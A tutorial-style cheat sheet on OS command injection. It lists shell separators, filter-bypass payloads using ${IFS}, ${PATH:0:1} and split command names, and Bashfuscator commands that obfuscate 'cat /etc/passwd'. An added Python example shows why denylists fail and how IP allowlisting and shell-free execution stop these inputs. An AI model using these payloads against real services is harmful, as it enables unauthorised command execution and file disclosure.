# Command Injection

## Basic Command Injection

```bash
;      # semicolon
\n     # newline (URL-encoded as %0a)
&      # background
|      # pipe
&&     # AND
||     # OR
``     # sub-shell (backticks)
$()    # sub-shell
```

## Advanced Command Injection

### When Spaces and Paths (/etc/passwd, /, /home) Are Not Allowed

```bash
# %0a is a URL-encoded newline
# ls lists the directory contents
# ${IFS} stands in for a space when spaces are blacklisted
# ${PATH:0:1} expands to / (the first character of the PATH variable)

ip=127.0.0.1%0als${IFS}${PATH:0:1}

# The final command becomes:

127.0.0.1
ls /
```

## Bypassing Blacklists (whoami, pwd, ls, cat)

```bash
who$@ami
w`h`o`a`mi  # the number of backticks should be even
```
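
Why the filters targeted in the two sections above fail, and what replaces them, as an added example (not part of the original page): a substring denylist accepts this page's payloads, while parsing the `ip` value as an address and running the command without a shell rejects them. The denylist contents, the function names and the ping-style feature behind the `ip` parameter are assumptions.

```python
import ipaddress
import subprocess
from urllib.parse import unquote

# Constructed denylist: spaces, slashes, separators and command names.
DENYLIST = (" ", "/", ";", "&", "|", "whoami", "pwd", "cat")

def denylist_allows(value: str) -> bool:
    """Weak check: accept anything that contains no denylisted substring."""
    return not any(token in value for token in DENYLIST)

def build_ping_argv(raw_ip: str) -> list[str]:
    """Strong check: the value must parse as exactly one IP address.

    Raises ValueError for anything else (newlines, ${...}, extra text).
    """
    addr = ipaddress.ip_address(raw_ip)
    # Argument vector, not a command string: no shell ever interprets the value.
    return ["ping", "-c", "1", str(addr)]

def ping(raw_ip: str) -> subprocess.CompletedProcess:
    """Run ping without a shell (a list argv means shell=False)."""
    return subprocess.run(build_ping_argv(raw_ip),
                          capture_output=True, text=True, timeout=5)

def is_valid_ip(raw_ip: str) -> bool:
    """True only when the allowlist check accepts the value."""
    try:
        build_ping_argv(raw_ip)
        return True
    except ValueError:
        return False

# Payloads taken from this page, URL-decoded the way a web framework would.
PAGE_PAYLOADS = [
    unquote("127.0.0.1%0als${IFS}${PATH:0:1}"),
    "who$@ami",
]

if __name__ == "__main__":
    for value in ["127.0.0.1", *PAGE_PAYLOADS]:
        print(repr(value),
              "denylist accepts:", denylist_allows(value),
              "allowlist accepts:", is_valid_ip(value))
```
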

## Automated Obfuscation Tool for Command Injection

### BashFuscator

<https://github.com/Bashfuscator/Bashfuscator>

We can use this tool to obfuscate a command:

```bash
bashfuscator -c "cat /etc/passwd"
```

By default it produces a very large payload. To make it shorter, we can use the command below:

```bash
bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
```

